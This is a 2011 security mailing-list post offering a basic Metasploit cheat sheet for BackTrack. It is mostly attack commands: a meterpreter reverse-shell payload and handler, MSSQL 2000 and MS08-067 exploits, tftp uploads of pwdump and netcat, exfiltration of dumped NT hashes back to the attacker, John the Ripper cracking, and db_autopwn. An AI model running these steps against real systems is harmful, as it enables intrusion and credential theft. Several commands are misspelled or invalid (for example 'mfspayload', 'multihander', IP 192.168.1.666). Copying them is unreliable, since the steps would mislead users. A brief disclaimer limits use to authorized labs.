[Plug-security] Basic Metasploit CHEAT Sheet
Lisa Kachold
lisakachold at obnosis.com
Tue Jan 18 11:30:29 MST 2011
Okay, you guys, here's a couple of HowTo's for basic Metasploit from
Backtrack4R1:
0) Quick Windows MultiHandler Reverse Shell
startx
/etc/init.d/./wicd start
{check your wireless or wired connection is working}
mfspayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444
>/root/payload.exe
optimize /root/putty.exe (for Windows target)
msfconsole
mfs> use exploit/multihander
mfs> set PAYLOAD windows/meterpreter/reverse_tcp
mfs> show options
mfs> set RHOST (local host ip)
mfs> shell go
mfsconsole > migrate <process #>
example msfconsole > migrate 256
mfs> show explore
mfs> use name (from show explore)
mfs> set PAYLOAD
mfs> set RHOST
mfs> set LHOST
1) Nmap Mssql 2000
nmap -sT -0 10.10.10.254
nmap -sV 10.10.10.254
mfsconsole
show exploits
cut and paste with your mouse highlight
use mssql2000_resolution
set PAYLOAD win32_bind_meterpreter
show options
set RHOST (target) 10.10.10.254
exploit
help
execute -n Process
execute -f file
execute -f cmd -c
interact 1
ipconfig
see Menu---->System-->MISC--->TFTPD Server Start
On your Backtrack Linux shell:
cd /pentest/windows-binaries/tools
ls
cp PwDmp4.dll /tmp/PwDmp4.exe
cd /pentest/password/dictionaries
ls
cp wordlist.txt.gz /tmp/wordlist.txt
tftp -i 10.10.10.254 get PwDump4.dll (or exe)
tftp -i 10.10.10.254 get nc,exe
<go back to windows shell>
pwDmp4.exe
pwDmp4.exe \l \o:pwdmp4.txt
tftp 10.10.10.666 (our ip) put pwdmp4.txt
<back to linux BT environment shell>
cat pwdmp4.txt
john pwdmp4.txt
john -show pwdmp4.txt
john -w:wordlist.txt -f:NT pwdmp4.txt
<back to Windows>
nc -L -p 10.10.10.254
<back to BT linux shell>
telnet victim - login as Administrator with password
2) Quick VNC using Autopwn
mfsconsole
db_create foo
db_nmap <targetip or> 10.10.10.254
db_autopwn -h
db_autopwn -p -e
sessions -i 1
sysinfo
run vnc_oneport
3) Quick SMB (use another exploit if you like) & VNC Reverse Shell
mfsconsole
use windows/smb/ms08_067_netapi
show options
set PAYLOAD windows/vncinject/reverse_tcp
show options
set RHOST 10.10.10.254
show options
set LHOST 10.10.10.666
exploit
<spawns a shell on reverse machine>
4) Example using Nessus Plugins and db_autopwn
<shell>
apt-get install nessusd nessus
nessusd (takes about 10 minutes to start)
cd /pentest/exploits/framework3
svn update
./mfsconsole
<another shell>
./nessus
Start a scan and Generate a Report
mfs> help
mfs> db_create /root/database/foobar.db
mfs> db_import
Cross reference from report showing exploit port open and probable
reported from Nessus
Save output of the Nessus report to /root/nessus.nbe
mfs> db_import_nessus_nbe /root/nessus.nbe
mfs> db_autopwn -p -e
Viola!
*
**DISCLAIMER: The use of Backtrack4R2 is advocated in pentest laboratories
only and for fully qualified professionals after written Corporate
approval. We do not advocate "cracking" and prefer the definition
hacker<http://hacker.>in it's original term meaning those who reverse
engineer and creatively
evaluate to learn. We do not advocate "learning to hack"; instead hacking
to learn.*
Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com
January 29, 2011, Noon until 3PM.
--
(503) 754-4452
(623) 688-3392
http://www.obnosis.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-security/attachments/20110118/dfa6c6f1/attachment.html>
More information about the Plug-security
mailing list